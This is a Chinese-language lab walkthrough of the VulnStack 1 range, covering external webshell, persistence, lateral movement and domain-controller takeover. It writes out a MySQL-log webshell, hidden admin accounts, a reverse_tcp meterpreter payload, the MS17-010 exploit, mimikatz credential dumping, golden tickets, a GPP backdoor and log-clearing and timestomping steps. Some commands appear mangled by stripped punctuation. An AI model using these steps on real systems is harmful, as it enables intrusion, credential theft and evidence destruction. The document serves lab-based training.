VulnStack 1 靶场实战:从外网Getshell到内网域控的5个关键步骤复盘
VulnStack 1靶场深度实战从外网突破到域控掌控的战术全解析1. 靶场环境与攻击路径全景红日安全团队打造的VulnStack 1靶场模拟了典型企业网络架构包含三层关键节点边界服务器双网卡Win7系统外网NAT内网仅主机模式域成员主机Win2003服务器192.168.52.141域控服务器Win2008 R2192.168.52.138攻击路径拓扑呈现为外网攻击机(Kali) → Win7边界服务器 → 内网域成员 → 域控DC典型的企业渗透测试中超过78%的内网渗透通过Web服务漏洞实现初始突破本靶场完美复现了这一场景。2. 外网突破Web服务攻防实战2.1 信息收集的艺术使用组合式探测技术获取靶标全景# 存活主机扫描 nmap -sn 192.168.1.0/24 # 全端口扫描 nmap -sS -sV -p- 192.168.1.10 # 目录爆破 gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirb/common.txt关键发现PHPMyAdmin后台/phpmyadminPHP探针/phpinfo.php网站绝对路径泄露C:/phpStudy/WWW2.2 漏洞利用链构建突破点选择矩阵漏洞类型利用难度成功率隐蔽性PHPMyAdmin弱口令低高中日志文件写入中高高文件上传漏洞高低低实际采用日志写入Getshell技术-- 开启日志记录 SET GLOBAL general_logON; -- 重定向日志路径 SET GLOBAL general_log_fileC:/phpStudy/WWW/shell.php; -- 写入PHP代码 SELECT ?php system($_GET[cmd]);?注意当secure_file_priv限制存在时日志写入是比SELECT INTO OUTFILE更可靠的Webshell写入方式3. 权限维持与内网渗透准备3.1 后门部署方案对比方案A隐藏用户创建net user hacker$ Pssw0rd /add net localgroup administrators hacker$ /add方案BMSF持久化msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.1.100 LPORT4444 -f exe update.exe persistence -X -i 60 -p 443 -r 192.168.1.1003.2 网络拓扑测绘通过Meterpreter进行内网探测arp -a # ARP缓存分析 route print # 路由表分析 netstat -ano # 活动连接分析发现关键内网段192.168.52.0/244. 内网横向移动技术矩阵4.1 信息收集自动化脚本# 域信息收集 net config workstation net view /domain net group Domain Admins /domain # 主机发现 for /L %i in (1,1,254) do ping -n 1 192.168.52.%i | find TTL4.2 横向移动技术选型MS17-010利用流程use exploit/windows/smb/ms17_010_psexec set RHOSTS 192.168.52.141 set payload windows/x64/meterpreter/bind_tcp exploit密码喷射攻击当获取域用户凭证时crackmapexec smb 192.168.52.0/24 -u userlist.txt -p Spring2023!5. 域控攻防终极之战5.1 权限提升路线图本地提权getsystem migrate -N lsass.exe凭证窃取load kiwi creds_all票据传递golden_ticket_create -u Administrator -d god.org -s S-1-5-21-1218 -k krbtgt_hash5.2 域控持久化方案组策略首选项GPP利用!-- 创建定时任务 -- scheduledtasks clsid{...} task enabledtrue runAsSYSTEM nameUpdate actions exec commandcmd.exe/command arguments/c net user backdoor Pssw0rd! /add net localgroup administrators backdoor /add/arguments /exec /actions /task /scheduledtasks6. 防御视角的对抗策略6.1 攻击痕迹清除checklistWeb日志清理C:\phpStudy\Apache\logs\*系统日志清理wevtutil cl security文件时间戳修改timestomp -f 01/01/2020 00:00:00 shell.php6.2 企业防护建议边界防护限制PHPMyAdmin外部访问启用MySQL的secure_file_priv内网监控部署SMB协议审计监控异常PsExec执行域控加固禁用NTLMv1启用LSA保护在真实攻防演练中从外网突破到域控掌控的平均时间约为4.2小时而防守方检测到入侵的平均时间为98小时。本靶场演练的价值在于将复杂的攻击链拆解为可复现的技术单元建议在完全掌握基础流程后尝试以下高阶挑战不使用MS17-010的替代渗透路径实现全流量加密的C2通信绕过杀软的内存注入技术